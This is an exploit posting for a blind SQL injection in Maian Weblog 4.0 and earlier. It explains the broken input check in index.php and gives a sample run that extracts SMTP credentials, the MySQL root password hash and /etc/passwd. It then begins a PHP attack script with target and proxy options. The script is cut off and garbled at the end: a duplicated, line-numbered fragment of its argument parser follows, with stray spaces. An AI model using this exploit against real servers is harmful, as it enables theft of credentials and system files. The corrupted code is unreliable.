Maian Weblog is a free blog system. In Maian Weblog 4.0 and earlier, index.php contains a blind SQL injection vulnerability that can lead to disclosure of sensitive information.
[+] Info:
~~~~~~~~~
Maian weblog <= v4.0 remote blind SQL injection exploit
[+] Poc:
~~~~~~~~~
<?php
/*
maian weblog <= v4.0 Remote Blind SQL Injection Exploit
vendor: http://www.maianscriptworld.co.uk/
Thanks to Johannes Dahse: http://bit.ly/dpQXMK

Explanation:
On lines 335-341 of index.php we see this if statement, which concerns
our variable $B_post:

// Check month and year vars...
// If they don't equal 0, are they numeric?..
if ($B_post == 0 && !ctype_digit($B_post))
{
    header("Location: index.php");
    exit;
}

This if statement is supposed to prevent the SQL injection vulnerability.
However the logic implemented is incorrect, as there will never be a situation
where the $B_post variable that we control will be both 0 and a string value.

So a simple fix to remediate this issue becomes clear: instead of an &,
the author was supposed to use a |. o.O

Further down in index.php, on lines 348-361, we see the location of the
actual vulnerable code:

$q_blog = mysql_query("SELECT * FROM " . $database[prefix] . "blogs
    WHERE id = $B_post
    LIMIT 1
") or die(mysql_error());
$BLOG = mysql_fetch_object($q_blog);

// At this point, lets see if the last query fetched anything..
// If it didn't, blog id is invalid. Might be someone bookmarked an old link..
// If no data, redirect to homepage..
if (mysql_num_rows($q_blog) == 0)
{
    header("Location: index.php");
    exit;
}

The page redirects after the query is executed. This way you probably won't spot
the bug in your browser from a blackbox view :). No urldecode(), so we can't bypass
magic_quotes_gpc, and the admin credentials are not stored in the database. doh.

Using <or> would make the PoC a little more efficient, but oh well :0)
Assuming some stars are aligned, the PoC will make well over 11,000 requests...
[mr_me@pluto maian_weblog]$ php PoC.php -t 192.168.56.101 -d /maian_weblog/ -p 127.0.0.1:8080

-------------------------------------------------------
maian weblog <= v4.0 Remote Blind SQL Injection Explo!t
by mr_me - https://net-ninja.net/
-------------------------------------------------------

(+) Setting the proxy to 127.0.0.1:8080
(+) Getting basic database information
(+) Database version -> 5.1.41-3ubuntu12.9
(+) Database name -> maian_weblog
(+) Database user -> root@localhost
(+) SMTP details found!
(+) Getting SMTP host:user:pass -> localhost:maianmail:password
(+) Access to MySQL database successful, dumping hash!
(+) MySQL user:pass -> root:*EE4E2773D7530819563F0DC6FCE27446A51C9413
(!) Access to load_file(), wanna play? (Y/n): y

(+) Please enter the file (q to quit): /etc/shadow
(-) File doesnt exist/no access.
(+) Please enter the file (q to quit): /etc/passwd
(!) Dumping the /etc/passwd file, hold onto your knickers!
root:x:0:0:root:/bin/bash
daemon:x:1:1:daemon:......
*/

print_r("
-------------------------------------------------------
maian weblog <= v4.0 Remote Blind SQL Injection Explo!t
by mr_me - https://net-ninja.net/
-------------------------------------------------------
");

if ($argc < 3) {
    print_r("
-----------------------------------------------------------------------------
Usage: php " . $argv[0] . " -t
  host: target server (ip/hostname)
  path: directory path to wordpress
Options:
  -p [ip:port]: specify a proxy
Example:
  php " . $argv[0] . " -t 192.168.1.5 -d /webapps/wp/ -p 127.0.0.1:8080
  php " . $argv[0] . " -t 192.168.1.5 -d /webapps/wp/
-----------------------------------------------------------------------------
");
    die;
}

error_reporting(7);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

// Matches a dotted-quad IP address in the -p proxy argument.
$proxy_regex = "(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})";

// Parse argv into an associative array: --key=value pairs, -x flags, and bare inputs.
// ereg() was removed in PHP 7, so preg_match() is used here instead.
function setArgs($argv) {
    $_ARG = array();
    foreach ($argv as $arg) {
        if (preg_match("/--([^=]+)=(.*)/", $arg, $reg)) {
            $_ARG[$reg[1]] = $reg[2];
        } elseif (preg_match("/^-([a-zA-Z0-9])/", $arg, $reg)) {
            $_ARG[$reg[1]] = "true";
        } else {
            $_ARG["input"][] = $arg;
        }
108} elseif (ereg ("^-([a-zA-Z0-9])", $ arg, $ reg )){
109 $ _ ARG [$ reg [1] = "true ";
110} else {
111 $ _ ARG ["input"] [] = $ arg;
112}
113